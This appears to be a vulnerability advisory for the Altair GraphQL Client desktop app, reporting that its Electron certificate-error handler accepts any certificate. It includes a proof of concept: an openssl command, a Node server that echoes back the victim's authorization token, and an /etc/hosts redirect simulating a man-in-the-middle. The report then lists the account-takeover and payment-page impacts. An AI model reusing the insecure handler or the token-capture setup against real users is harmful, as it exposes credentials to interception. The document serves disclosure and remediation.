Summary
Altair GraphQL Client's desktop app does not validate HTTPS certificates allowing a man-in-the-middle to intercept all requests.
Details
Certificate validation is disabled here:
|
app.on( |
|
'certificate-error', |
|
(event, webContents, url, error, certificate, callback) => { |
|
event.preventDefault(); |
|
callback(true); |
|
// Inform user of invalid certificate |
|
webContents.send('certificate-error', error); |
|
} |
|
); |
This is intended to allow making queries against local servers using self-signed certificates, however, this has unintended security implications. This affects all requests made in the renderer context including GraphQL requests made by the user and internal requests made by Altair's GraphQL Cloud account system.
PoC
-
Generate self-signed certificates with openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 3650. Use default values for all fields.
-
Save this as server.js:
const https = require('https');
const fs = require('fs');
const server = https.createServer({
key: fs.readFileSync('key.pem'),
cert: fs.readFileSync('cert.pem')
}, (req, res) => {
res.write('Hello victim. Your token is: ' + req.headers.authorization);
res.end();
});
server.listen(443, () => console.log('Server started'));
-
Start the server with sudo node server.js. Root permissions are only used to listen on port 443.
-
To simulate a man-in-the-middle, append to /etc/hosts to make traffic to https-validation-bug-poc.altairgraphql.dev go to the server started in step 3:
127.0.0.1 https-validation-bug-poc.altairgraphql.dev
Validate that this was successful by visiting https://https-validation-bug-poc.altairgraphql.dev in a browser. An HTTPS certificate error should appear due to the self-signed certificates.
-
Open the Altair desktop app and make a GraphQL request to https://https-validation-bug-poc.altairgraphql.dev/ using any query and a random bearer token.
-
Despite using HTTPS, the certificate error due to the attacker's server using a self-signed certificate is ignored. The attacker's server returns a response demonstrating full access to the request's headers and body, which is then displayed in the Altair interface. This attack would also work on a real GraphQL API like api.github.com.
In addition to compromising the confidentiality and integrity of the victim's GraphQL requests, the attacker can also:
- compromise the confidentiality and integrity of the victim's Altair GraphQL Cloud account as those requests are also sent from the renderer context and thus without certificate validation
- modify requests to billing APIs like https://api.altairgraphql.dev/user/upgrade-pro to return a checkout URL controlled by the attacker instead of a real Altair checkout page
In all of these attacks the warning "Your request has an invalid certificate. You should check that your request is coming from a trusted source" does appear. However:
- by the time the warning appears, the attack has already been completed
- the warning is easy to miss in the bottom-right corner and disappears quickly
- the warning does not provide sufficient context for a user to determine if the request came from a "trusted source"
- the same message is used for requests that were not initiated by the user such as Altair GraphQL Cloud synchronizing collections when the app is opened
Impact
Any Altair users on untrusted networks (eg. public wifi, malicious DNS servers) may have all GraphQL request and response headers and bodies fully compromised including authorization tokens. The attack also allows obtaining full access to any signed-in Altair GraphQL Cloud account and replacing payment checkout pages with a malicious website.
GarboMuffin Reporter
Summary
Altair GraphQL Client's desktop app does not validate HTTPS certificates allowing a man-in-the-middle to intercept all requests.
Details
Certificate validation is disabled here:
altair/packages/altair-electron/src/app/index.ts
Lines 162 to 170 in 004f645
This is intended to allow making queries against local servers using self-signed certificates, however, this has unintended security implications. This affects all requests made in the renderer context including GraphQL requests made by the user and internal requests made by Altair's GraphQL Cloud account system.
PoC
Generate self-signed certificates with
openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 3650. Use default values for all fields.Save this as
server.js:Start the server with
sudo node server.js. Root permissions are only used to listen on port 443.To simulate a man-in-the-middle, append to
/etc/hoststo make traffic to https-validation-bug-poc.altairgraphql.dev go to the server started in step 3:Validate that this was successful by visiting https://https-validation-bug-poc.altairgraphql.dev in a browser. An HTTPS certificate error should appear due to the self-signed certificates.
Open the Altair desktop app and make a GraphQL request to https://https-validation-bug-poc.altairgraphql.dev/ using any query and a random bearer token.
Despite using HTTPS, the certificate error due to the attacker's server using a self-signed certificate is ignored. The attacker's server returns a response demonstrating full access to the request's headers and body, which is then displayed in the Altair interface. This attack would also work on a real GraphQL API like api.github.com.
In addition to compromising the confidentiality and integrity of the victim's GraphQL requests, the attacker can also:
In all of these attacks the warning "Your request has an invalid certificate. You should check that your request is coming from a trusted source" does appear. However:
Impact
Any Altair users on untrusted networks (eg. public wifi, malicious DNS servers) may have all GraphQL request and response headers and bodies fully compromised including authorization tokens. The attack also allows obtaining full access to any signed-in Altair GraphQL Cloud account and replacing payment checkout pages with a malicious website.